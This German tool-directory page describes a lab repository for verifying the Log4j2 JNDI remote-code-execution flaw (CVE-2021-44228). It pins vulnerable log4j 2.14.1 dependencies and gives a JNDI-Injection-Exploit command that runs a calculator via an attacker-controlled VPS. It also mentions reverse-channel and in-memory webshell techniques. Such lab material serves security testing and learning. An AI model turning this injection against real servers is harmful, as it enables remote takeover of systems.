Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Apache-Log4j2-RCE — Apache Log4j2 RCE( CVE-2021-44228) Verifizierungsumgebung | Kitploit
Tools/GitHubGitHub/1in9e/apache-log4j2-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE( CVE-2021-44228) Verifizierungsumgebung

Repository anzeigen
211vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache Log4j2 RCE Verifizierungsumgebung

Seit dem 09.12.2021

Einige Referenzen

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

Umgebung einrichten

Maven-Abhängigkeiten einbinden und die anfälligen Versionen angeben

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

Überprüfung

DNSLog nutzen, um zu prüfen, ob es verwendet wird

0

LDAP in Kombination mit JNDI für RCE

Abhängig von der JDK-Version: Ab JDK 11.0.1, 8u191, 7u201, 6u211 muss trustURLCodebase manuell auf true gesetzt werden.

Weitere Details dazu unter https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

Verwendungsmethode: Kann mit JNDI-Injection-Tools kombiniert werden, z.B. JNDI-Injection-Exploit, fastjson_rce_tool und JNDIExploit

Es können auch Tools kombiniert werden, um verschiedene bereits veröffentlichte Rückkanal-Methoden und Methoden zur Injektion von In-Memory-Webshells zu implementieren.

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

Über

https://github.com/apache/logging-log4j2/tags

Tool herunterladen